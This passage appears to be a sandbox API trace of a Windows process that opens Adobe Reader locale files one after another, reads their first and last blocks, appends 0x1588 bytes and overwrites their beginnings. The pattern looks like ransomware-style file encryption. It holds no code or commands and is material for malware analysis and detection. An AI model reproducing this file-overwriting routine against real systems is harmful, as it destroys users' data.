lpUsedDefaultChar=0x0) returned 9 [0070.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CZE", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.CZE", lpUsedDefaultChar=0x0) returned 9 [0070.635] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0070.637] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.637] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0070.637] CloseHandle (hObject=0x1cc) returned 1 [0070.638] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\ReadOutLoud.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\readoutloud.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.639] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.639] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2a00 [0070.640] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.640] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.640] ReleaseMutex (hMutex=0x168) returned 1 [0070.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CZE", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0070.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CZE", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.CZE", lpUsedDefaultChar=0x0) returned 15 [0070.640] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.642] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0070.643] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.643] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0070.643] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.644] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0070.644] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.644] CloseHandle (hObject=0x1cc) returned 1 [0070.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\updater.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\updater.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.646] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.646] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2a00 [0070.646] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.647] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.647] ReleaseMutex (hMutex=0x168) returned 1 [0070.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CZE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CZE", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.CZE", lpUsedDefaultChar=0x0) returned 11 [0070.647] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.649] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0070.650] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.650] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0070.651] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.651] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0070.651] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.651] CloseHandle (hObject=0x1cc) returned 1 [0070.653] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\DigSig.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\digsig.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0071.752] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.752] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1f200 [0071.752] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.752] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.753] ReleaseMutex (hMutex=0x168) returned 1 [0071.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.DAN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.DAN", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.DAN", lpUsedDefaultChar=0x0) returned 10 [0071.753] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0071.755] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1e200 [0071.755] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.758] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1e200 [0071.758] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.758] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0071.759] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.759] CloseHandle (hObject=0x1e8) returned 1 [0071.759] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\PPKLITE.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ppklite.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0071.760] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.760] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7f000 [0071.760] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.761] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.761] ReleaseMutex (hMutex=0x168) returned 1 [0071.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.DAN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.DAN", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.DAN", lpUsedDefaultChar=0x0) returned 11 [0071.761] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0071.764] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7e000 [0071.764] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.766] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7e000 [0071.767] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.768] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0071.768] WriteFile (in: hFile=0x1e8, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0071.769] CloseHandle (hObject=0x1e8) returned 1 [0071.769] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0071.770] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.770] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe1 [0071.770] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.771] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.771] ReleaseMutex (hMutex=0x168) returned 1 [0071.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0071.771] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ee71c8, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee71c8*, lpNumberOfBytesRead=0x311f2bc*=0xe1, lpOverlapped=0x0) returned 1 [0071.772] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0071.772] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a6198*, nNumberOfBytesToWrite=0x669, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a6198*, lpNumberOfBytesWritten=0x311f2d0*=0x669, lpOverlapped=0x0) returned 1 [0071.773] CloseHandle (hObject=0x1e8) returned 1 [0071.773] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\BRdlang32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\brdlang32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0071.775] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.775] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3600 [0071.775] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.775] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.776] ReleaseMutex (hMutex=0x168) returned 1 [0071.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.DEU", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.DEU", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.DEU", lpUsedDefaultChar=0x0) returned 13 [0071.776] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.778] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2600 [0071.778] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.779] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2600 [0071.780] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.782] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0071.782] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.783] CloseHandle (hObject=0x1e8) returned 1 [0071.783] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Multimedia.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\multimedia.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0071.784] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.784] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x14600 [0071.784] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.784] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.784] ReleaseMutex (hMutex=0x168) returned 1 [0071.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.DEU", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0071.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.DEU", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.DEU", lpUsedDefaultChar=0x0) returned 14 [0071.785] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0071.787] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x13600 [0071.787] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.788] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x13600 [0071.789] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.790] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0071.790] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.790] CloseHandle (hObject=0x1e8) returned 1 [0071.790] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\SendMail.deu" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\sendmail.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0071.791] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.791] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4000 [0071.791] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0071.792] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.792] ReleaseMutex (hMutex=0x168) returned 1 [0071.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.deu", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.deu", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.deu", lpUsedDefaultChar=0x0) returned 12 [0071.792] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.303] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3000 [0072.303] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.304] SetFilePointer 